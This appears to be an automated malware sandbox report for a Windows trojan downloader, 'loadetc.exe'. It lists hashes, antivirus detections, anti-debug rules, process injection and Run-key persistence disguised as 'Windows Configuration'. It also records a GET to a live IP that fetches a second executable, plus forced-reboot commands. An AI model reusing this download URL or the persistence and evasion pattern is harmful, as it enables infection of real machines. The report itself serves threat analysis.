Summary | ZeroBOX

loadetc.exe

AntiVM PE32 AntiDebug PE File
Category Machine Started Completed
FILE s1_win7_x6402 Sept. 15, 2021, 9:24 a.m. Sept. 15, 2021, 9:37 a.m.
Size 7.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 2bd18b0ce7aa8dfaee0e922090aae138
SHA256 e11a90704ac0ea7eacb7d9eeda4a6db1e6fb3f21402d06429617f9af69d0a1b8
CRC32 FEB73373
ssdeep 96:2qUneX10H8fJTIbuAFo+7Ptboynun/AqyCtGdYX7E:aeX7aP1oynW/A0eG
PDB Path
Yara
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
172.67.188.154 Active Moloch
164.124.101.2 Active Moloch
185.215.113.84 Active Moloch

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: Press any key to continue . . .
console_handle: 0x0000000000000007
1 1 0
pdb_path
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
packer Armadillo v1.71
suspicious_features Connection to IP address suspicious_request GET http://185.215.113.84/ec.exe
request GET http://185.215.113.84/ec.exe
description loadetc.exe tried to sleep 135 seconds, actually delayed analysis time by 4 seconds
file C:\Users\test22\wincfg.exe
file C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat
file C:\Users\test22\AppData\Local\Temp\CE5.tmp\Defender.exe
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000000ac
filepath: C:\Users\test22\5tyuuow.txt
desired_access: 0x40100080 (FILE_READ_ATTRIBUTES|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\5tyuuow.txt
create_options: 96 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT)
status_info: 2 (FILE_CREATED)
share_access: 0 ()
1 0 0
cmdline "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat C:\Users\test22\wincfg.exe"
cmdline cmd.exe /c shutdown /r
cmdline "C:\Windows\System32\cmd.exe" /c shutdown /r
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd.exe
parameters: /c shutdown /r
filepath: cmd.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Windows\system32\cmd
parameters: /c "C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat C:\Users\test22\wincfg.exe"
filepath: C:\Windows\System32\cmd
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd†E@]ð/ 2bC@ÀD˜ñÈ ¨BÐÔ¨öH.code™Z\ `.textµp` `.rdata=K€Lf@@.pdata
request_handle: 0x00cc000c
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat C:\Users\test22\wincfg.exe"
cmdline cmd.exe /c shutdown /r
cmdline shutdown /r
cmdline "C:\Windows\System32\cmd.exe" /c shutdown /r
cmdline C:\Windows\System32\cmd /c "C:\Users\test22\AppData\Local\Temp\CE5.tmp\CF5.tmp\CF6.bat C:\Users\test22\wincfg.exe"
host 172.67.188.154
host 185.215.113.84
reg_key HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Configuration reg_value C:\Users\test22\wincfg.exe
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Configuration reg_value C:\Users\test22\wincfg.exe
file C:\Users\test22\wincfg.exe:Zone.Identifier
Process injection Process 2264 resumed a thread in remote process 2452
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x0000000000000230
suspend_count: 1
process_identifier: 2452
1 0 0
Lionic Trojan.Win32.Generic.a!c
Elastic malicious (high confidence)
MicroWorld-eScan Generic.Malware.S!dld!.CD6F7FD7
FireEye Generic.mg.2bd18b0ce7aa8dfa
McAfee Artemis!2BD18B0CE7AA
Cylance Unsafe
Sangfor Trojan.Win32.Save.a
CrowdStrike win/malicious_confidence_90% (W)
BitDefenderTheta Gen:NN.ZexaF.34142.auW@aqugTtpi
Symantec ML.Attribute.HighConfidence
ESET-NOD32 Win32/TrojanDownloader.Tiny.NTK
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Downloader.Win32.Generic
BitDefender Generic.Malware.S!dld!.CD6F7FD7
Avast Win32:MalwareX-gen [Trj]
Tencent Win32.Trojan-downloader.Generic.Huzp
Ad-Aware Generic.Malware.S!dld!.CD6F7FD7
Emsisoft Generic.Malware.S!dld!.CD6F7FD7 (B)
McAfee-GW-Edition BehavesLike.Win32.Generic.zt
Sophos Mal/Generic-S
eGambit Unsafe.AI_Score_97%
Avira TR/Crypt.XPACK.Gen
Kingsoft Win32.Heur.KVMH017.a.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
GData Generic.Malware.S!dld!.CD6F7FD7
Cynet Malicious (score: 100)
AhnLab-V3 Malware/Win32.Generic.C4204685
Acronis suspicious
VBA32 suspected of Trojan.Downloader.gen
ALYac Generic.Malware.S!dld!.CD6F7FD7
MAX malware (ai score=87)
Malwarebytes Generic.Malware/Suspicious
Rising Trojan.Generic@ML.100 (RDMK:ymjbG3a0zhHo1Vz5kgmlLQ)
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
AVG Win32:MalwareX-gen [Trj]
Cybereason malicious.ce7aa8